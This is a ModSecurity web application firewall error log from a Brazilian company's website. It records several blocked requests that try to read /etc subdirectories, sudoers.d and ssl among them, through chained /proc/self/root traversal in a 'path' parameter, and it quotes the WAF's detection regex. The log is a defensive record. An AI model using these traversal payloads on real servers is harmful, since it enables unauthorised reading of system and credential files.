[Mon Mar 16 18:01:50.852353 2026] [:error] [pid 21805:tid 140411666392832] [client 74.7.228.16:49378] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abhvvrABkC4fWIHEf8ESCQAAAEk"]
[Mon Mar 16 18:01:51.531548 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:45400] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvv46lpbStxTqkSkuEvQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:01:52.808306 2026] [:error] [pid 29802:tid 140411599251200] [client 74.7.243.203:45404] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvwM_BxrYCr4hPDw8F-AAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:00.284675 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:45406] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvyLABkC4fWIHEf8ESEQAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:01.580340 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.243.203:57236] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lwcorp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvyf9ocpUE4ed4uDwPLQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:03.317976 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.243.203:57248] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvy8_BxrYCr4hPDw8F-wAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:04.434910 2026] [:error] [pid 29507:tid 140411733534464] [client 74.7.243.203:57258] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvzEr9dMAiw-8KANNkOAAAAQE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:05.767002 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.243.203:57264] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvzbysWC90G-1nBrBgGQAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:06.929569 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:57280] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhvzo6lpbStxTqkSkuEvwAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:17.174959 2026] [:error] [pid 10651:tid 140411641214720] [client 74.7.243.203:57290] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv2bysWC90G-1nBrBgIQAAAYw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:18.505088 2026] [:error] [pid 15061:tid 140411683178240] [client 74.7.243.203:57662] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv2qTCbgAP5jq5TehHdAAAAsc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:19.677153 2026] [:error] [pid 15568:tid 140411540502272] [client 74.7.243.203:57668] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv26QpVkWug9HeOt9PhgAAA1g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:20.954491 2026] [:error] [pid 14895:tid 140411582465792] [client 74.7.243.203:46564] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv3FajLEzk2WiQ-10uMgAAApM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:22.164573 2026] [:error] [pid 29507:tid 140411708356352] [client 74.7.243.203:46574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv3kr9dMAiw-8KANNkOwAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:23.347010 2026] [:error] [pid 15061:tid 140411741927168] [client 74.7.243.203:46580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv36TCbgAP5jq5TehHdgAAAsA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:24.688629 2026] [:error] [pid 29507:tid 140411658000128] [client 74.7.243.203:46588] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv4Er9dMAiw-8KANNkPQAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:26.532549 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.243.203:46602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv4qTCbgAP5jq5TehHdwAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:27.860074 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.243.203:46614] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv446lpbStxTqkSkuEwAAAAkg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:29.231579 2026] [:error] [pid 15061:tid 140411565680384] [client 74.7.243.203:46620] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/sysctl.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv5aTCbgAP5jq5TehHeAAAAtU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:30.378758 2026] [:error] [pid 29507:tid 140411632822016] [client 74.7.243.203:43506] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv5kr9dMAiw-8KANNkPgAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:31.633096 2026] [:error] [pid 29802:tid 140411691570944] [client 74.7.243.203:43516] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv58_BxrYCr4hPDw8F_gAAAcY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:02:46.255339 2026] [:error] [pid 21806:tid 140411674785536] [client 74.7.241.46:45410] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhv9tSswJuvopo3lOh7cAAAAIg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:02:58.685355 2026] [:error] [pid 15061:tid 140411699963648] [client 74.7.241.46:52916] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwAqTCbgAP5jq5TehHiAAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:03:10.317173 2026] [:error] [pid 10831:tid 140411708356352] [client 74.7.241.46:53282] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwDo6lpbStxTqkSkuE0AAAAkQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:03:20.303007 2026] [:error] [pid 29507:tid 140411674785536] [client 74.7.241.46:47128] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhwGEr9dMAiw-8KANNkeAAAAQg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
